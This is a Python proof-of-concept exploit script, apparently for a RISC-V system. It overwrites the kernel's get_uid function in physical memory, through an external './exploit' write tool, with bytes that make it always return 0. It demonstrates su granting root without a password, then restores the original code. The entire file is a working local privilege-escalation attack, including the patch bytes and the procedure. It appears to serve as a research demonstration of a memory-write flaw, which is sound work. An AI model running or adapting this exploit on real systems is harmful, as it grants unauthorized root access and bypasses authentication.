import os
import subprocess
import sys
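# Load the per-system facts (original getuid() bytes and its physical address)
# produced by physhelper.py. Abort if they are missing: the original version
# only printed a hint and then fell through to a NameError on the next line.
try:
    import phys_data
except ImportError:
    sys.exit("please run physhelper.py first")

# Original machine code at the start of the kernel's get_uid function. Assumed
# known; it is only needed to restore the function to its exact original state.
GETUID_ORIG = phys_data.get_uid_code

# Replacement for the start of get_uid that makes it always return 0 (root).
# RISC-V, little-endian:
#   0: 00000513   li  a0,0
#   4: 8082       ret   (compressed 16-bit encoding)
GETUID_PATCH = b"\x13\x05\x00\x00\x82\x80"

ORIG_FILE = "getuid_orig.bin"
PATCH_FILE = "getuid_patch.bin"

# Physical address of get_uid. The PoC assumes the attacker knows it: on the
# targeted system the physical layout stays the same across reboots, so it can
# be determined once on an identical machine.
PHYS_ADDRESS = phys_data.get_uid_addr


def _write_blob(path, blob):
    """Replace *path* with a file containing exactly *blob*.

    The file is closed before returning so ./exploit never reads a partially
    flushed blob.
    """
    # Drop any stale file first (equivalent of the original `rm -f`).
    try:
        os.remove(path)
    except FileNotFoundError:
        pass
    with open(path, "wb") as f:
        f.write(blob)


def _write_phys(blob_file):
    """Write the bytes in *blob_file* over get_uid in physical memory.

    Raises subprocess.CalledProcessError when ./exploit exits non-zero, so a
    failed write is never mistaken for a successful patch or restore.
    """
    subprocess.run(["./exploit", f"0x{PHYS_ADDRESS:x}", blob_file], check=True)


def _run_su():
    """Spawn an interactive su; it prompts for a password unless getuid() is 0."""
    subprocess.run(["su"])


# Blobs for the original and the patched code; the original is required to put
# the kernel back so that not every process stays root afterwards.
_write_blob(ORIG_FILE, GETUID_ORIG)
_write_blob(PATCH_FILE, GETUID_PATCH)

# 1. Run as an unprivileged user: this su prompts for a password.
_run_su()

# 2. Patch get_uid by writing directly to its physical memory. From now on su
#    believes it is executed by root (getuid() -> 0) and skips authentication.
# 3. Always restore the original bytes -- also on Ctrl-C or a failing step --
#    otherwise the machine is left with an always-root get_uid().
try:
    _write_phys(PATCH_FILE)
    _run_su()
finally:
    _write_phys(ORIG_FILE)

# 4. With the original code back, su requires a password again.
_run_su()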